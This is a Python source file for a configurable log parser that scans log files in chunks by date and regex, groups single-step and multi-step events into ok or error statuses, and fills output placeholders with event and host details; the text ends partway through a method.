!/usr/bin/env python3\n\n# constants\nLOG_INTEND = 4\nLOG_MAX_TEXT_LEN = 80\nKEY_KEYS = 'keys'\nCONFIG_FILE = './config/logparser.yml'\nCONN_FILE = './config/connections.yml'\nVAR_DELIMITER = '%'\n# placeholders\nPH_DATE = '%dt%'\nPH_DATE_NOW = '%dtNow%'\nPH_BUSINESS_AREA = '%businessArea%'\nPH_CHUNK_KEY = '%chunkKey%'\nPH_CONFIGFILE = '%configFile%'\nPH_CUSTOMER_ID = '%customerId%'\nPH_EVENT_STATUS = '%eventStatus%'\nPH_EVENT_DATE = '%eventDate%'\nPH_EVENT_MESSAGE = '%eventMessage%'\nPH_ENVIRONMENT = '%environment%'\nPH_PARSER_ID = '%parserId%'\nPH_PARSER_REGEX = '%parserRegex%'\nPH_SOURCEFILE = '%sourceFile%'\nPH_SOURCE_LINE_NUM = '%sourceLineNum%'\nPH_SOURCE_HOST = '%sourceHost%'\nPH_SOURCE_HOST_SHORT = '%sourceHostShort%'\nPH_SOURCE_SYSTEM = '%sourceSystem%'\nPH_PYTHON_COMPILER = '%pythonCompiler%'\nPH_PYTHON_VERSION = '%pythonVersion%'\nPH_PYTHON_IMPLEMENTATION = '%pythonImplementation%'\nPH_PYTHON_SCRIPT = '%pythonScript%'\n\n\nclass ClsChunk:\n \"\"\" This class is a container for chunk information\n in form of properties.\n\n It is initialized by a chunk of a file and creates\n properties of it.\n \"\"\"\n\n def __init__(self, chunk):\n self.__chunk = chunk\n if self.__chunk:\n assert isinstance(self.__chunk, list)\n\n @property\n def list(self):\n if self.__chunk:\n return self.__chunk\n else:\n return None\n\n @property\n def length(self):\n if self.__chunk:\n return [('size', len(self.__chunk))]\n else:\n return None\n\n @property\n def line_start(self):\n if self.__chunk:\n return [('start', self.__chunk[0]['number'])]\n else:\n return None\n\n @property\n def line_end(self):\n if self.__chunk:\n return [('end', self.__chunk[-1]['number'])]\n else:\n return None\n\n @property\n def log_info(self):\n if self.__chunk:\n return [self.line_start[0], self.line_end[0], self.length[0]]\n else:\n return None\n\n\nclass ClsResList:\n \"\"\" This class is a container for result information\n in form of properties.\n\n It is initialized by a result list and creates\n properties of it.\n \"\"\"\n\n def __init__(self, res_list):\n self.__r_list = res_list\n if self.__r_list:\n assert isinstance(self.__r_list, list)\n\n @property\n def list(self):\n return self.__r_list\n\n @property\n def length(self):\n return len(self.__r_list)\n\n @property\n def status_tuples(self):\n s_count = {}\n for r in self.__r_list:\n if r['status'] not in s_count:\n s_count[r['status']] = 1\n else:\n s_count[r['status']] += 1\n # sort keys for output\n s_list = []\n for k, v in s_count.items():\n s_list.append((k, v))\n s_list.sort()\n return s_list\n\n def filter(self, *, status_list=None) -> list:\n \"\"\"\n This function filters the list of normalized combi items (events)\n for a given list of status\n\n :param status_list: Status list which events are filtered for\n :return: Filtered list of normalized combi items (events)\n \"\"\"\n if status_list:\n return [r for r in self.__r_list if r['status'] in status_list]\n else:\n return self.__r_list\n\n\nclass ClsEnvTuples:\n \"\"\" This class is a container for environment information\n in form of tuples.\n \"\"\"\n\n def __init__(self):\n self.__list = []\n if socket.gethostname().find('.') >= 0:\n self.__list.append((PH_SOURCE_HOST, socket.gethostname()))\n self.__list.append((PH_SOURCE_HOST_SHORT, socket.gethostname().split('.')[0]))\n else:\n self.__list.append((PH_SOURCE_HOST, socket.gethostbyaddr(socket.gethostname())[0]))\n self.__list.append((PH_SOURCE_HOST_SHORT, socket.gethostname()))\n self.__list.append((PH_SOURCE_SYSTEM, platform.system()))\n self.__list.append((PH_PYTHON_COMPILER, platform.python_compiler()))\n self.__list.append((PH_PYTHON_VERSION, platform.python_version()))\n self.__list.append((PH_PYTHON_IMPLEMENTATION, platform.python_implementation()))\n self.__list.append((PH_PYTHON_SCRIPT, sys.argv[0]))\n\n @property\n def list(self):\n return self.__list\n\n\nclass ClsParser:\n \"\"\" This class is a container for any parser instance.\n A parser is meant to do the parsing of\n a dedicated log object.\n \"\"\"\n\n def __init__(self, dict_log, dict_parser, logger):\n # log\n self.__dict_log = dict_log\n self.__log_id = dict_log['id']\n self.__log_environment = dict_log['environment']\n self.__log_business_area = dict_log['businessArea']\n self.__log_name = dict_log['name']\n self.__log_type = dict_log['type']\n self.__log_pathname = dict_log['pathName']\n self.__log_filename = dict_log['fileName']\n self.__log_file_path = dict_log['pathName'] + '/' + dict_log['fileName']\n self.__log_file_lines_number = self.get_log_lines_number()\n self.__log_date_exists = dict_log['date']['exists']\n self.__log_date_format = dict_log['date']['format']\n self.__log_date_regex = dict_log['date']['regex']\n # parser\n self.__dict_parser = dict_parser\n self.__parser_id = dict_parser['id']\n self.__parser_text = dict_parser['text']\n # - chunk\n try:\n self.__parser_chunk_size = dict_parser['selection']['chunk']['size']\n if self.__parser_chunk_size > self.__log_file_lines_number:\n self.__parser_chunk_size = self.__log_file_lines_number\n except TypeError:\n self.__parser_chunk_size = 100000\n except AttributeError:\n self.__parser_chunk_size = 100000\n try:\n self.__parser_chunk_number = abs(dict_parser['selection']['chunk']['number'])\n if self.__parser_chunk_number * self.__parser_chunk_size > self.__log_file_lines_number:\n self.__parser_chunk_number = self.__log_file_lines_number // self.__parser_chunk_size\n except TypeError:\n self.__parser_chunk_number = 0 # 0 - all chunks\n except AttributeError:\n self.__parser_chunk_number = 0 # 0 - all chunks\n try:\n self.__parser_chunk_offset = dict_parser['selection']['chunk']['offset']\n isinstance(self.__parser_chunk_offset, int)\n if abs(self.__parser_chunk_offset * self.__parser_chunk_size) > self.__log_file_lines_number:\n if self.__parser_chunk_offset > 0:\n self.__parser_chunk_offset = self.__log_file_lines_number // self.__parser_chunk_size\n else:\n self.__parser_chunk_offset = -1 * (self.__log_file_lines_number // self.__parser_chunk_size)\n if self.__parser_chunk_offset < 0:\n if self.__parser_chunk_number > abs(self.__parser_chunk_offset):\n self.__parser_chunk_number = abs(self.__parser_chunk_offset)\n except TypeError:\n self.__parser_chunk_offset = 0\n self.__parser_chunk_index = self.__parser_chunk_offset\n self.__parser_chunk_count = self.__parser_chunk_number\n self.__parser_mode_id = dict_parser['mode']['id']\n try:\n self.__parser_mode_keys_text = dict_parser['mode']['keys']['text']\n self.__parser_mode_keys_group = dict_parser['mode']['keys']['group']\n self.__parser_mode_interval = dict_parser['mode']['interval']\n except KeyError:\n self.__parser_mode_keys_text = []\n self.__parser_mode_keys_group = 0\n self.__parser_mode_interval = {'hours': 0}\n self.__parser_regex_positive = dict_parser['regex']['positive'] == 'yes'\n self.__parser_regex = dict_parser['regex']['text']\n self.__parser_key_level = dicttools.count_key_level(dict_parser, KEY_KEYS)\n self.__parser_search_col = self.search_list()\n self.__parser_filter_time = dict_parser['selection']['time']['active'] == 'yes'\n self.__parser_filter_status = dict_parser['selection']['status']\n self.__parser_time_offset = self.get_parser_time_offset()\n self.__parser_time_interval = self.get_time_interval()\n self.__parser_const_status_ok = self.__dict_parser['result']['constants']['status']['ok']\n self.__parser_const_status_error = self.__dict_parser['result']['constants']['status']['error']\n self.__parser_const_status_warning = self.__dict_parser['result']['constants']['status']['warning']\n self.__parser_dt_start = datetime.datetime.now() + datetime.timedelta(**self.__parser_time_offset)\n self.__parser_dt_end = self.__parser_dt_start + datetime.timedelta(**self.__parser_time_interval)\n if re.search(r'(-?\\d*):(-?\\d*):(\\d*)', dict_parser['selection']['group']['slice']):\n self.__parser_group_slice = dict_parser['selection']['group']['slice']\n else:\n self.__parser_group_slice = '-1::' # default - last element\n self.__parser_result_fields = dict_parser['result']['fields']\n self.env_tuples = ClsEnvTuples()\n if 'file' in dict_parser['out']:\n self.__parser_result_file_path = dict_parser['out']['file']['pathName'] + '/' + \\\n dict_parser['out']['file']['fileName']\n self.__parser_result_file_path = self.__parser_result_file_path.replace(PH_PARSER_ID, self.__parser_id)\n if 'http' in dict_parser['out']:\n self.__parser_http_out_chunk_key = dict_parser['out']['http']['chunkKey']\n self.__parser_http_out_time_factor = dict_parser['out']['http']['timeFactor']\n if 'mail' in dict_parser['out']:\n self.__parser_mail_out_chunk_key = dict_parser['out']['mail']['chunkKey']\n self.__parser_mail_out_time_factor = dict_parser['out']['mail']['timeFactor']\n\n # logger\n self.__logger = logger\n\n @property\n def result_file_path(self):\n return self.__parser_result_file_path\n\n @property\n def http_out_chunk_key(self):\n try:\n assert isinstance(self.__parser_http_out_chunk_key, str)\n return self.__parser_http_out_chunk_key\n except AssertionError:\n return None\n\n @property\n def http_out_time_factor(self):\n try:\n assert isinstance(self.__parser_http_out_time_factor, int)\n return self.__parser_http_out_time_factor\n except AssertionError:\n return None\n\n @property\n def log_date_exists(self):\n try:\n assert isinstance(self.__log_date_exists, str)\n return self.__log_date_exists\n except AssertionError:\n return None\n\n @property\n def log_file_path(self):\n try:\n assert isinstance(self.__log_file_path, str)\n return self.__log_file_path\n except ValueError:\n return None\n\n def get_log_lines_number(self):\n \"\"\"\n Get the number of lines in log file.\n :return: The number of lines in log file.\n \"\"\"\n line_counter = 0\n with open(self.log_file_path, 'r') as fh:\n for _ in fh:\n line_counter += 1\n return line_counter\n\n def get_chunk(self, n=0):\n \"\"\"\n Get the next chunk from logfile or if given the n-th chunk.\n\n :param n: optional parameter for the n-th chunk to obtain\n :return: Dictionary containing the next or n-th chunk of logfile\n - number: line number of logfile\n - date: line date if existing\n - text: line text\n\n \"\"\"\n chunk = []\n line_counter = 0\n\n if n > 0:\n chunk_no = n - 1\n else:\n chunk_no = self.__parser_chunk_index\n self.__parser_chunk_index += 1\n # check number of requested chunks has already been reached\n if self.__parser_chunk_number == 0:\n return None\n else:\n self.__parser_chunk_number -= 1\n\n if chunk_no >= 0:\n chunk_line_start = (chunk_no * self.__parser_chunk_size) + 1\n else:\n chunk_line_start = self.__log_file_lines_number + (chunk_no * self.__parser_chunk_size) + 1\n chunk_line_end = chunk_line_start + self.__parser_chunk_size - 1\n\n with open(self.__log_file_path, 'r') as fh:\n for line in fh:\n line_counter += 1\n item = {}\n if line_counter in range(chunk_line_start, chunk_line_end + 1):\n item['number'] = line_counter\n item['date'] = self.get_datetime(line)\n item['text'] = line\n chunk.append(item)\n\n return chunk\n\n def filter_chunk(self, chunk, filter_type):\n \"\"\"\n Filter a chunk of lines for defined criteria like date range of key words.\n\n :param chunk: chunk of lines from logfile\n :param filter_type: 'date' - filter for lines in datetime range\n 'keys' - filter for the keys\n :return: List containing the filtered lines\n \"\"\"\n filtered_chunk = []\n take_item = False # don't take items until the first item with a date is compliant\n if filter_type == 'date':\n if self.log_date_exists:\n for item in chunk:\n if item['date']:\n if self.in_time_range(item):\n filtered_chunk.append(item)\n take_item = True # switch take_item ON to take subsequent items without date\n elif take_item:\n take_item = False # switch take_item OFF to ignore subsequent items without date\n elif take_item:\n filtered_chunk.append(item)\n else:\n if filter_type == 'keys':\n for item in chunk:\n if self.in_search_list(item['text']):\n filtered_chunk.append(item)\n return filtered_chunk\n\n def has_dates(self):\n \"\"\"\n Evaluates if log file lines contain datetime values\n :return: True if log file lines contain datetime values\n return self.log_date_exists == 'yes'\n \"\"\"\n return self.log_date_exists == 'yes'\n\n def get_datetime(self, line):\n \"\"\"\n Extracts the datetime from a line string based\n on a regular expression search\n :param line: String containing a datetime\n :return: datetime or None\n \"\"\"\n try:\n m = re.search(self.__log_date_regex, line)\n dt_string = m.group(0)\n dt = datetime.datetime.strptime(dt_string, self.__log_date_format)\n assert isinstance(dt, datetime.datetime)\n return dt\n except TypeError:\n return None\n except AttributeError:\n return None\n\n def get_parser_time_offset(self):\n \"\"\"\n Get the time offset for line selection.\n If nothing is specified, take a default of -99998 days\n\n :return: time offset as key value pair\n \"\"\"\n time_offset = dict()\n\n try:\n datetime.timedelta(**self.__dict_parser['selection']['time']['offset'])\n time_offset = self.__dict_parser['selection']['time']['offset']\n except TypeError:\n time_offset['days'] = -99998\n return time_offset\n\n def get_time_interval(self):\n \"\"\"\n Get the time interval for line selection.\n If nothing is specified, take take a default of 99999 days\n\n :return: time interval as key value pair\n \"\"\"\n time_interval = dict()\n try:\n datetime.timedelta(**self.__dict_parser['selection']['time']['interval'])\n time_interval = self.__dict_parser['selection']['time']['interval']\n except TypeError:\n time_interval['days'] = 99999\n return time_interval\n\n def in_time_range(self, item):\n \"\"\"\n Looks if item is within a time range defined by\n self.__parser_dt_start and self.__parser_dt_end\n\n :param item: Item is a dictionary representing one line of logfile\n with some additional attributes.\n :return: true if extracted datetime is in time range,\n otherwise false\n \"\"\"\n if self.has_dates():\n try:\n return self.__parser_dt_start <= item['date'] <= self.__parser_dt_end\n except TypeError:\n return False\n else:\n return False\n\n def search_list(self):\n \"\"\"\n Build a list of all search key combinations including the regex.\n The maximum level of nested keys is 4.\n\n :return: List with each item containing three lists\n - in: list of search strings\n - out: list of translated search strings\n - regex: regular expression for search\n \"\"\"\n combi_list = []\n\n def compose_result(in_lst, out_lst, rx, rx_dt):\n \"\"\"\n This sub function composes the final search list.\n It's useful, as it can be called at different places\n depending on the level of nested keys in configuration.\n :param in_lst: list of search strings\n :param out_lst: list of translated search strings\n :param rx: regex pattern for line search\n :param rx_dt: regex pattern for date search\n :return: Dictionary item containing an\n - in: list of search strings\n - out: list of translated search strings\n - regex: regular expression for search\n \"\"\"\n result_item = {}\n\n rx = rx.replace(PH_DATE, rx_dt)\n for i in range(0, len(in_lst)):\n rx = rx.replace('%k' + str(i + 1) + '%', in_lst[i])\n\n result_item['in'] = in_lst\n result_item['out'] = out_lst\n result_item['regex'] = rx\n\n return result_item\n\n if KEY_KEYS in self.__dict_parser.keys():\n\n for k1 in self.__dict_parser[KEY_KEYS]:\n # re-initialize for every 1st level key\n in_list = []\n out_list = []\n in_list.append(k1['text'])\n out_list.append(k1['out'])\n if KEY_KEYS in k1.keys():\n for k2 in k1[KEY_KEYS]:\n # re-initialize with preserving above level information\n in_list = in_list[:1]\n out_list = out_list[:1]\n in_list.append(k2['text'])\n out_list.append(k2['out'])\n if KEY_KEYS in k2.keys():\n for k3 in k2[KEY_KEYS]:\n # re-initialize with preserving above level information\n in_list = in_list[:2]\n out_list = out_list[:2]\n in_list.append(k3['text'])\n out_list.append(k3['out'])\n if KEY_KEYS in k3.keys():\n for k4 in k3[KEY_KEYS]:\n # re-initialize with preserving above level information\n in_list = in_list[:3]\n out_list = out_list[:3]\n in_list.append(k4['text'])\n out_list.append(k4['out'])\n combi_list.append(compose_result(in_list, out_list, self.__parser_regex,\n self.__log_date_regex))\n else:\n combi_list.append(\n compose_result(in_list, out_list, self.__parser_regex, self.__log_date_regex))\n else:\n combi_list.append(\n compose_result(in_list, out_list, self.__parser_regex, self.__log_date_regex))\n else:\n combi_list.append(compose_result(in_list, out_list, self.__parser_regex, self.__log_date_regex))\n\n return combi_list\n\n def in_search_list(self, line):\n \"\"\"\n Check if line meets parser regex list.\n :param line: line of logfile\n :return: Return True if line meets parser regex list.\n \"\"\"\n in_list = False\n for item in self.__parser_search_col:\n if re.search(item['regex'], line):\n in_list = True\n break\n return in_list\n\n def combi_list(self, chunk):\n \"\"\"\n This function extends search list items with the found items.\n :param chunk: List of filtered items, each of which containing\n - number: line number\n - date: date of line\n - text: text of line\n :return: List containing the search items together with the found items.\n \"\"\"\n combi_list = []\n for search_item in self.__parser_search_col:\n found_list = []\n for found_item in chunk:\n if re.search(search_item['regex'], found_item['text']):\n found_list.append(found_item)\n # post process found_list\n # slice the list in order to get only defined items\n # -1:None:None for only the last item\n found_list = self.sliced_list(found_list, self.__parser_group_slice)\n\n # add found_list to search_item\n search_item['found'] = found_list\n combi_list.append(search_item)\n\n return combi_list\n\n def combi_list_normalized(self, clist):\n \"\"\"\n This function normalizes the combi list by transforming items with\n multiple found items into items with one result for one or more found items.\n Thus the normalized combi list will contain more items then the input combi list.\n\n The objective is to have items also in the case of searches not being successful,\n where the found list is empty. In any case there will be a status and a message.\n\n :param clist: List containing the search items together with the found items.\n - regex: regular expression for search\n - in: keys for search\n - out: keys for output\n - found: list of dicts\n - number: line number\n - date: date of line\n - text: text of line\n :return: List containing the normalized combi list.\n - regex: regular expression for search\n - in: list of keys for search\n - out: list of keys for output\n - number: line number\n - date: date of line\n - status: event status (ok, error)\n - text: found text\n - message: event message\n \"\"\"\n combi_list_normalized = []\n for citem in clist:\n if self.__parser_regex_positive:\n # regex search looks for positive events\n if citem['found']:\n # positive events found\n if self.__parser_mode_id == 1:\n # single mode\n for fitem in citem['found']:\n cin = {} # combi item normalized\n for k in citem.keys():\n if k == 'found':\n cin['number'] = fitem['number']\n cin['date'] = fitem['date']\n cin['status'] = self.__parser_const_status_ok\n cin['text'] = fitem['text']\n cin['message'] = fitem['text']\n else:\n cin[k] = citem[k]\n combi_list_normalized.append(cin)\n else:\n if self.__parser_mode_id == 2:\n # multi mode - all found items (steps) shall result in in one item (event)\n cin = self.multi_item_normalized(citem, self.__parser_mode_keys_text,\n self.__parser_mode_keys_group)\n # Check if a valid event has been returned.\n # None means, the multi step event has not been finished yet, hence no adding to the list.\n if not (cin is None):\n combi_list_normalized.append(cin)\n else:\n # positive events not found\n cin = {} # combi item normalized\n for k in citem.keys():\n if k == 'found':\n cin['number'] = None\n cin['date'] = datetime.datetime.now()\n cin['status'] = self.__parser_const_status_error\n cin['text'] = None\n cin['message'] = 'Not found: ' + citem['regex']\n else:\n cin[k] = citem[k]\n combi_list_normalized.append(cin)\n else:\n # regex search looks for negative events\n if citem['found']:\n # negative events found\n if self.__parser_mode_id == 1:\n # single mode\n for fitem in citem['found']:\n cin = {} # combi item normalized\n for k in citem.keys():\n if k == 'found':\n cin['number'] = fitem['number']\n cin['date'] = fitem['date']\n cin['status'] = self.__parser_const_status_error\n cin['text'] = fitem['text']\n cin['message'] = fitem['text']\n else:\n cin[k] = citem[k]\n combi_list_normalized.append(cin)\n else:\n # negative events not found\n cin = {} # combi item normalized\n for k in citem.keys():\n if k == 'found':\n cin['number'] = None\n cin['date'] = datetime.datetime.now()\n cin['status'] = self.__parser_const_status_ok\n cin['text'] = None\n cin['message'] = 'Not found: ' + citem['regex']\n else:\n cin[k] = citem[k]\n combi_list_normalized.append(cin)\n\n return combi_list_normalized\n\n def multi_item_normalized(self, citem, evtlist, rgroup):\n \"\"\"\n This function normalizes one combi list item by evaluating multiple found items.\n The objective is to consolidate found items each representing a defined step of a\n multi step event (e.g. START, END) into one resulting normalized combi list item.\n\n In case that there is one step missing or the number of the steps does not match\n the status will become error.\n\n :param citem: One item of the combi list containing found items each representing\n one step of a multi step event.\n :param evtlist: List of multiple keywords each representing one step of a\n multiple step event.\n :param rgroup: The regex group where the key of the evtlist is contained.\n :return: One normalized combi list item or None, if the multiple step event is incomplete\n and lies within the allowed maximum time interval\n \"\"\"\n\n def step_counts_equal(scounter) -> bool:\n \"\"\"\n Check if all step counts are equal\n :rtype : bool\n :param scounter: step counter\n :return: True if all step counts are equal\n \"\"\"\n i = None\n for _, v in scounter:\n if not i:\n i = v\n else:\n if not i == v:\n return False\n return True\n\n def steps_in_order(citm, elist, rgrp) -> bool:\n \"\"\"\n Check if event steps are in order.\n :param citm: One item of the combi list containing found items each representing\n one step of a multi step event.\n :param elist: List of multiple keywords each representing one step of a\n multiple step event.\n :param rgrp: The regex group where the key of the evtlist is contained.\n :return: True if all events steps are in order\n \"\"\"\n # check if there is an item 'date' in the found item list\n # if not, return steps_in_order=True\n if not citm['found'][0]['date']:\n return True\n\n # get a found item list sorted by data ascending\n c_item_found_sorted = sorted(citm['found'], key=itemgetter('date'))\n\n # slice last n items of found items\n # n is number of event steps\n slice_str = '-' + str(elist.__len__) + '::'\n c_item_found_sliced = self.sliced_list(c_item_found_sorted, slice_str)\n\n str_last_item_date = None\n assert isinstance(c_item_found_sliced, list)\n i = 0\n for f in c_item_found_sliced:\n if str_last_item_date:\n if not f['date'] == str_last_item_date:\n rs = re.search(citem['regex'], f['text'])\n if not re.search(elist[i], rs.group(rgrp)):\n return False\n else:\n str_last_item_date = f['date']\n i += 1\n return True\n \n def steps_in_timerange(citm, interval) -> bool:\n \"\"\"\n Check if event steps are in the allowed step interval.\n The latest step is assumed to be not older than the maximum allowed time between two steps.\n :param citm: One item of the combi list containing found items each representing\n one step of a multi step event.\n :param interval: Maximum allowed time between two steps.\n :return: True if latest step is not older then interval\n \"\"\"\n # check if there is an item 'date' in the found item list\n # if not, return steps_in_order=True\n if not citm['found'][0]['date']:\n return True\n\n # get a found item list sorted by data ascending\n c_item_found_sorted = sorted(citm['found'], key=itemgetter('date'))\n\n str_last_item_date = None\n assert isinstance(c_item_found_sorted, list)\n for f in c_item_found_sorted:\n str_last_item_date = f['date']\n\n # check date against now\n # if latest item date is not older than the step interval, then return true\n # dt = datetime.datetime.strptime(str_last_item_date, self.__log_date_format)\n try:\n return str_last_item_date + datetime.timedelta(**interval) > datetime.datetime.now()\n except TypeError:\n return False\n\n # count steps for every step type of the multi step event (e.g. START, END)\n step_counter = [] # list of event count tuples (event_key, count)\n for eitem in evtlist:\n count = 0\n for fitem in citem['found']:\n m = re.search(citem['regex'], fitem['text'])\n if re.search(eitem, m.group(rgroup)):\n count += 1\n step_counter.append((eitem, count))\n\n # build normalized combi item\n cin = {} # combi item normalized\n\n error_step_order = ''\n if step_counts_equal(step_counter):\n if steps_in_order(citem, evtlist, rgroup):\n status = self.__parser_const_status_ok\n else:\n # at least one step is missing, maybe due to a multi step process still not finished\n # check if latest step is not older than the allowed process time per step\n if steps_in_timerange(citem, self.__parser_mode_interval):\n # multi step event is incomplete but within max allowed time interval\n return None\n else:\n status = self.__parser_const_status_error\n error_step_order = ' error: steps not in order!'\n else:\n # at least one step is missing, maybe due to a multi step process still not finished\n # check if latest step is not older than the allowed process time per step\n if steps_in_timerange(citem, self.__parser_mode_interval):\n # multi step event is incomplete but within max allowed time interval\n return None\n else:\n status = self.__parser_const_status_error\n\n for k in citem.keys():\n if k == 'found':\n m = re.search(citem['regex'], citem[k][-1]['text'])\n cin['number'] = citem[k][-1]['number']\n if citem[k][-1]['date']:\n cin['date'] = citem[k][-1]['date']\n else:\n cin['date'] = datetime.datetime.now()\n cin['status'] = status\n cin['text'] = m.group(0)\n cin['message'] = m.group(0) + ' (step counter: ' + format(step_counter) + ', ' + error_step_order + ')'\n else:\n cin[k] = citem[k]\n\n return cin\n\n @staticmethod\n def sliced_list(org_list, slice_str):\n \"\"\" Reduce the number of list items by slice.\n\n :param org_list: List to be sliced\n :param slice_str: String telling how to slice\n :return: Sliced list\n \"\"\"\n o_list = org_list\n m = re.search(r'(-?\\d*):(-?\\d*):(\\d*)', slice_str)\n x, y, z = m.groups(None)\n\n try:\n x = int(x)\n except ValueError:\n x = None\n try:\n y = int(y)\n except ValueError:\n y = None\n try:\n z = int(z)\n except ValueError:\n z = None\n\n sliced_list = o_list[x:y:z]\n return sliced_list\n\n def result_tuples(self, citem):\n \"\"\" This function builds result tuples.\n The result tuples contain placeholders as keys\n and the respective values. They will be used for building the\n result dictionary by replacing placeholders by values.\n\n The background is, that the result dictionary may contain nested\n elements like another dictionary. The result tuple is a flat result set\n for collecting the results and serves as a kind of intermediate result.\n\n Example:\n ('%k1%', 'AZSE') - key is the placeholder '%k1%', value is 'AZSE'\n\n :param citem: Normalized combi item containing search and found items\n :return: tuples list containing the results\n \"\"\"\n # time\n # date\n date_now = datetime.datetime.now()\n if citem['date'] is None:\n event_date = datetime.datetime.now()\n else:\n event_date = citem['date']\n # time factor\n try:\n time_factor = int(self.http_out_time_factor)\n except AttributeError:\n time_factor = 1\n\n # tuple list\n tuple_list_all = []\n tuple_list = [(PH_ENVIRONMENT, self.__log_environment), (PH_BUSINESS_AREA, self.__log_business_area),\n (PH_PARSER_ID, self.__parser_id), (PH_PARSER_REGEX, citem['regex']),\n (PH_SOURCEFILE, self.__log_file_path), (PH_SOURCE_LINE_NUM, str(citem['number'])),\n (PH_CONFIGFILE, CONFIG_FILE), (PH_EVENT_STATUS, citem['status']),\n (PH_DATE_NOW, int(time.mktime(date_now.timetuple()) * time_factor)),\n (PH_EVENT_DATE, int(time.mktime(event_date.timetuple()) * time_factor)),\n (PH_EVENT_MESSAGE, str(citem['message']))]\n # environment details\n for k, v in self.env_tuples.list:\n tuple_list.append((k, v))\n # out keys %k..%\n for i, o in enumerate(citem['out'], start=1):\n tuple_list.append(('%k' + str(i) + '%', o))\n # tuple_list.append(('%k' + str(i) + '.lower%', str(o).lower()))\n # regex groups %g..%\n if citem['text']:\n m = re.search(citem['regex'], citem['text'])\n for i, r in enumerate(m.groups(), start=1):\n if i > 0:\n tuple_list.append(('%g' + str(i) + '%', r))\n else:\n for i in range(1, 10):\n tuple_list.append(('%g' + str(i) + '%', 'None'))\n\n for k, v in tuple_list:\n tuple_list_all.append((k, v)) # original tuple\n # lower and upper case tuples\n if isinstance(v, str):\n tuple_list_all.append((VAR_DELIMITER + k.strip(VAR_DELIMITER) + '.lower' + VAR_DELIMITER, v.lower()))\n tuple_list_all.append((VAR_DELIMITER + k.strip(VAR_DELIMITER) + '.upper' + VAR_DELIMITER, v.upper()))\n else: # keep it unchanged\n tuple_list_all.append((VAR_DELIMITER + k.strip(VAR_DELIMITER) + '.lower' + VAR_DELIMITER, v))\n tuple_list_all.append((VAR_DELIMITER + k.strip(VAR_DELIMITER) + '.upper' + VAR_DELIMITER, v))\n\n return tuple_list_all\n\n @staticmethod\n def fill_placeholders(obj_dict, tuple_list):\n \"\"\"\n Copy the dictionary obj_dict and replace placeholders with\n values from tuple_list\n :param obj_dict: Dictionary which serves as a pattern for the dictionary to return.\n :param tuple_list: Tuple list containing tuples of keys with names that equal the placeholder\n names in obj_dict and values that shall replace the placeholders.\n :return: Dictionary with values instead of placeholders\n \"\"\"\n resdict = copy.deepcopy(obj_dict)\n for key_map in dicttools.key_sequences(resdict):\n for k, v in tuple_list:\n dict_value_old = str(dicttools.get_from_dict(resdict, key_map))\n if re.search(k, dict_value_old):\n try:\n dict_value_new = dict_value_old.replace(k, v)\n except TypeError:\n dict_value_new = v # number\n dicttools.set_from_dict(resdict, key_map, dict_value_new)\n return resdict\n\n @property\n def result_list(self):\n \"\"\"\n This function gets the parser result as a list of dictionaries.\n\n :return: Parser result list of dictionaries\n \"\"\"\n chunks_accumulated = []\n result_list = []\n search_list = self.search_list()\n intend = LOG_INTEND * ' '\n print('parser: {}'.format(self.__parser_id))\n print('search list: size: {}\\n'.format(len(search_list)))\n self.__logger.info('Search for ' + str(len(search_list)) + ' regular expression patterns in the log file.')\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('Search patterns:')\n for s_item in search_list:\n self.__logger.debug(intend + s_item['regex'])\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('Processing chunks of the log file.')\n i = 0\n while True:\n # Get file content chunk wise to save memory\n # A chunk contains a number of lines defined in config file via chunksize.\n chunk = ClsChunk(self.get_chunk())\n if not chunk.list:\n break\n i += 1\n self.__logger.debug('{} {:>2}:'.format('Chunk', i))\n self.__logger.debug('{:>12} {}'.format('original:', chunk.log_info))\n print('chunk start: {}, end: {}, size: {}'.format(chunk.line_start, chunk.line_end, chunk.length))\n # filter date\n if self.__parser_filter_time:\n self.__logger.debug('Filtering dates ..')\n chunk_filtered_date = ClsChunk(self.filter_chunk(chunk.list, 'date'))\n if not chunk_filtered_date.list:\n self.__logger.debug('{:>12} {}'.format('filtered:', str(None)))\n continue\n self.__logger.debug('{:>12} {}'.format('filtered:', chunk_filtered_date.log_info))\n else:\n chunk_filtered_date = ClsChunk(chunk.list)\n # filter keys\n self.__logger.debug('Filtering keys ..')\n chunk_filtered_keys = ClsChunk(self.filter_chunk(chunk_filtered_date.list, 'keys'))\n if not chunk_filtered_keys.list:\n self.__logger.debug('{:>12} {}'.format('filtered:', str(None)))\n continue\n print('chunk_filtered: size: {}'.format(chunk_filtered_keys.length))\n self.__logger.debug('{:>12} {}'.format('filtered:', chunk_filtered_keys.log_info))\n # add found lines to the accumulated chunk list\n for item in chunk_filtered_keys.list:\n chunks_accumulated.append(item)\n\n # log search result\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.info('Found ' + str(len(chunks_accumulated)) + ' lines in the log file.')\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('Found lines:')\n for c_acc in chunks_accumulated:\n self.__logger.debug('{:8}: {}'.format(c_acc['number'], c_acc['text'].rstrip()))\n\n # combi list - combines search and found items\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('Combining search and found items in combi list.')\n combi_list = self.combi_list(chunks_accumulated)\n print('combi list: size: {}\\n'.format(len(combi_list)))\n self.__logger.debug('combi list: size: {}'.format(len(combi_list)))\n for c_item in combi_list:\n self.__logger.debug(c_item)\n\n # combi list getting normalized\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('Normalizing combi list by consolidating the found items.')\n combi_list_normalized = ClsResList(self.combi_list_normalized(combi_list))\n print('combi list normalized: size: {}\\n'.format(len(combi_list_normalized.list)))\n self.__logger.debug('combi list normalized: size: {}'.format(combi_list_normalized.length))\n for c_item in combi_list_normalized.list:\n self.__logger.debug(c_item)\n\n # combi list normalized is filtered for status\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('Normalized combi list is filtered for status.')\n combi_list_normalized_filtered = ClsResList(combi_list_normalized.filter(\n status_list=self.__parser_filter_status))\n self.__logger.debug('combi list normalized filtered: size: {}'.format(combi_list_normalized_filtered.length))\n for c_item in combi_list_normalized_filtered.list:\n self.__logger.debug(c_item)\n\n # log the event status\n self.__logger.info(LOG_MAX_TEXT_LEN * '-')\n self.__logger.info('Events:')\n self.__logger.info(intend + '{:12}{}'.format('status:', combi_list_normalized_filtered.status_tuples))\n 